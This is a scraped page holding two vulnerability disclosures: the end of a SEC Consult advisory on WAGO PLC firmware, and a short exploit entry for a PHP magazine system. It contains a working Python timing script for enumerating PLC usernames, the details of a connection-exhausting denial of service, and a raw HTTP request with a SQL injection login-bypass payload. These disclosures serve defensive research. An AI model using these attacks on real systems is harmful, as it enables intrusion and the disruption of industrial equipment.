int32_t packet_size<br />}<br /><br />The magic bytes will be 0xbbbb. By defining a packet size of 0xffffffff, a size<br />of 4 GB is defined. The following pseudo code will be used to handle the<br />request:<br /><br />allocated_mem = (byte*)SysAllocDataMemory(coedesys_header.packet_size);<br />buffer_info->recv_buf_wout_header = allocated_mem;<br />if (allocated_mem == (byte *)0x0) {<br /> return;<br />}<br /><br />As 4GB of memory aren't available, malloc will return a NULL pointer, which is<br />passed back through the SysAllocDataMemory() function and the return statement<br />in the pseudo code will be hit. Thus, the TCPServerTask() function will return.<br />The file descriptor for the client is not cleared in advance. Therefore, the<br />socket stays open indefinitely. A new client will open the next file<br />descriptor. As only 19 clients are allowed to be connected simultaneously, it<br />is sufficient to send 19 requests with a wrong packet length to force the PLC<br />into a state where it will refuse further connections to the Codesys service.<br /><br />The current implementation is missing the call to SysSockClose() once a buffer<br />allocation fails.<br /><br /><br />2) Enumeration of Users<br />A time-based side channel vulnerability in the webserver's authentication<br />method is leaking information about valid usernames. The following code snippet is<br />used in the login method:<br /><br />// get password file and iterate over every line<br />$pwFileArray = file($passwordFilename);<br />foreach($pwFileArray as $lineNo => $pwFileLine)<br />{<br /> // extract username and user password<br /> $passwordFileData = explode(':', trim($pwFileLine));<br /> // if username was found in line, verify given password with user password<br /> if(isset($passwordFileData[0]) && ($passwordFileData[0] === $username))<br /> {<br /> $pwCorrect = password_verify($password, $passwordFileData[1]);<br /> break;<br /> }<br />}<br /><br />The password hash is only calculated if the username is found to be valid. As<br />the PLC has limited computational power, this results in different timings for<br />the response depending on the validity of the username. The following script<br />can be used to find valid users. The parameter 'delay_valid' might need to be<br />adjusted to the network speed:<br /><br />----------------------------<br />#!/usr/sbin/python<br />import requests<br />import sys<br />import urllib3<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br />delay_valid = 0.2<br /><br />f = open(sys.argv[1],"r");<br /><br />for user in f.readlines():<br /> payload = {"username":user.replace('\n',''),"password":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}<br /> cnt = 0<br /> for i in range(5):<br /> try:<br /> r = requests.post("https://<your_PLC_IP>/wbm/php/authentication/login.php", json=payload, timeout=delay_valid, verify=False)<br /> except:<br /> cnt = cnt +1<br /> if cnt >=3:<br /> print("[*]Valid User: {}".format(user))<br />-----------------------------<br /><br /><br />3) Outdated Software with Known Vulnerabilities<br />Following outdated and vulnerable components were identified by using the IoT Inspector<br />firmware analysis tool:<br /><br />- Dsnmasq 2.80: 9 CVEs<br />- Bash 4.4.23: 1 CVE<br />- GNU glibc 2.30: 12 CVEs<br />- Linux Kernel 4.9.146: 663 CVEs<br />- OpenSSL 1.0.1: 103 CVEs<br />- BusyBox 1.30.1: 2 CVEs<br />- Curl 7.72.0: 1 CVE<br />- OpenSSH 7.9p1: 4 CVEs<br />- PHP 7.3.15: 11 CVEs<br />- Wpa_supplicant 2.6: 20 CVEs<br />- NET-SNMP 5.8: 1 CVE<br />- Libpcap 1.8.1: 5 CVEs<br />- Info-ZIP 3.0: 13 CVEs<br /><br /><br />4) Insufficient Hardening of Binaries<br />The following features were extracted with the IoT Inspector:<br />- 1.9% of all executables support full RELRO<br />- 84.6% support partial RELRO<br />- Only 3.6% of all executables make use of stack canaries<br />- 58.9% are using ASLR/PIE<br /><br />The plclinux_rt binary is an example of a particularly vulnerable binary. It<br />accepts user input on port 2455 and is missing all compile-time security<br />features. Thus, it's a perfect candidate to successfully exploit any identified<br />buffer overflow.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested and found to be vulnerable:<br />* WAGO 750-8xxx Firmware 18 (v03.06.11)<br />* WAGO 750-8xxx Firmware 15 (v03.03.10)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-05-25: Contacting vendor through support.at@wago.com, asking for<br /> security contact information. Support informed about their<br /> PSIRT team. Set preliminary release date to 2021-07-14.<br />2021-05-26: Contacting PSIRT through psirt@wago.com for encryption options.<br />2021-05-27: Received PGP key from PSIRT, transmitted encrypted advisory<br /> to psirt@wago.com.<br />2021-05-31: Wago PSIRT notifies about decryption problems.<br />2021-06-02: Wago PSIRT redirects to VDE CERT for encrypted transmission.<br /> Transmitted encrypted advisory to info@cert.vde.com. Set release<br /> date to 2021-07-22. Wago PSIRT resolves decryption problems.<br />2021-06-07: Received confirmation from VDE CERT.<br />2021-08-11: On request, Wago PSIRT informs about the investigation results<br /> and mentions that the DoS was already reported and is fixed with<br /> firmware 18 patch 3.<br />2021-08-18: A check on the most recent public firmware release<br /> v18 (v03.06.19) shows that the vulnerability still exists. Wago<br /> PSIRT is notified.<br />2021-09-01: Wago PSIRT confirms and ensures the issue is investigated.<br />2021-09-29: Request status from Wago PSIRT. Set new release date to 2021-11-16.<br />2021-09-30: Wago PSIRT states that CODESYS provided a fix which is currently<br /> tested and to wait for a coordinated release with CODESYS.<br />2021-10-15: CODESYS informs about the assigned CVE-2021-34593 and the planned<br /> publishing date.<br />2021-10-18: Requesting information from Wago on an updated firmware version.<br />2021-10-19: Wago PSIRT states that they just received the new CODESYS sources<br /> and it will take some more weeks to create a new firmware release.<br />2021-10-28: CODESYS vulnerability CVE-2021-34593 is released in a coordinated<br /> manner together with CODESYS group without exploit details.<br />2021-11-30: Request status from Wago PSIRT on new firmware release.<br />2022-01-17: Request status from Wago PSIRT on new firmware release again.<br />2022-01-18: Wago PSIRT informs that firmware 20 Patch 1 released on January 10,<br /> 2022 fixes the remaining issue. The firmware was not yet published<br /> on their website.<br />2022-01-26: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />Immediately update the PLCs to the fixed firmware version provided by the<br />vendor to mitigate CVE-2021-34593.<br /><br />The fixed firmware release 20 patch 1 can be obtained from<br />https://www.wago.com/de/d/6599873<br /><br />Regarding vulnerability 2)<br />As stated by Wago, there are only two possible default usernames. Therefore,<br />the username enumeration may not gain additional information and this will<br />not be changed.<br /><br />Additionally, due to varying release cycles, there is a delay<br />in updating components (affecting the other identified vulnerabilities). It is<br />planned to change to a new distribution release with firmware 20.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Gerhard Hechenberger, Steffen Robertz / @2022<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Online Magazine Management System 1.0 - SQLi Authentication Bypass<br /># Date: 01-12-2021<br /># Exploit Author: Mohamed habib Smidi (Craniums)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip<br /># Version: 1.0<br /># Tested on: Ubuntu<br /><br /><br /># Description :<br /><br />Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.<br /><br /># Request :<br /><br />POST /magazines/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)<br />Gecko/20100101 Firefox/93.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/magazines/admin/login.php<br />Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br /><br />username='+or+1%3D1+limit+1+--+-%2B&password=aaaa<br /><br /></code></pre>